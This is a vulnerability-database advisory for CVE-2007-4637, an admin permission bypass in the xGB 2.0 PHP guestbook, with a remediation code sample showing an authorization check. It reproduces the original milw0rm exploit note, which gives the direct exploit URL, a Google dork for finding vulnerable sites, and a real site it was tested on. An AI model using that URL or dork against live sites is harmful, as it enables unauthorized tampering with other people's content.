xGB xGB.php Admin Edit Permission Bypass Vulnerability

Vulnerability ID: 1113546    Vulnerability type: Unknown
Published: 2007-08-29    Updated: 2007-08-31
CVE: CVE-2007-4637    CNNVD-ID: CNNVD-200708-517
Platform: PHP    CVSS score: 6.4
|Vulnerability sources
https://www.exploit-db.com/exploits/4336
https://www.securityfocus.com/bid/85416
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-517
|Vulnerability details
xGB.php in xGB 2.0 does not require permission for the admin edit action, which allows remote attackers to make unspecified changes via a series of unknown steps.
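The defect described above is a missing authorization check on an action dispatcher. The following is an added illustration, not xGB's own code: a hypothetical act/do dispatcher in the style of the `xGB.php?act=admin&do=edit` request, with the admin branch gated on an authenticated session so that reaching the edit action by URL alone is not enough (the `xgb_admin` session key and the return labels are assumptions).

```php
<?php
// Hypothetical reconstruction (assumption, not xGB 2.0's real source) of a
// guestbook dispatcher keyed on ?act=...&do=..., showing where the
// authorization check belongs.
session_start();

// Assumed session flag set by a separate, password-protected login step.
function is_admin(): bool
{
    return isset($_SESSION['xgb_admin']) && $_SESSION['xgb_admin'] === true;
}

function dispatch(string $act, string $do): string
{
    if ($act === 'admin') {
        // The CVE-2007-4637 pattern is an admin branch that never checks
        // who is calling it; every admin action must be gated here, before
        // any sub-action (edit, delete, ...) is selected.
        if (!is_admin()) {
            http_response_code(403);
            return 'forbidden';
        }
        if ($do === 'edit') {
            return 'edit-form';   // render the message editor for admins only
        }
        return 'admin-home';
    }
    return 'guestbook';            // public view/post actions stay reachable
}

$act = $_GET['act'] ?? 'view';
$do  = $_GET['do']  ?? '';
echo dispatch($act, $do);
```

Run under a web server with PHP 7 or later; an unauthenticated request for `?act=admin&do=edit` yields HTTP 403 instead of the editor.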
|Vulnerability EXP
/*
*
* xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
* Bug discovered by DarkFuneral
* http://www.darkfuneral89.altervista.org/
*
* Affected Software: xGB
* CMS Site: "i don't know! :P"
* Severity: Critical
* Description: An attacker can edit all message in xGB
* Google Dork: allinurl:"xGb.php"
*
* E-Mail: darkfuneral89@gmail.com
* 
*
*
*
* Exploit Code: http://www.site.com/path/xGB.php?act=admin&do=edit
*
*
*
* Tested on www.culturebeach.de/guestbook.php
*
* Special Greetz to SystemFAILURE because I Love Him...
*
*/

# milw0rm.com [2007-08-29]
|Affected products
Xgb Xgb 2.0
|References

Source: MILW0RM
Name: 4336
Link: http://www.milw0rm.com/exploits/4336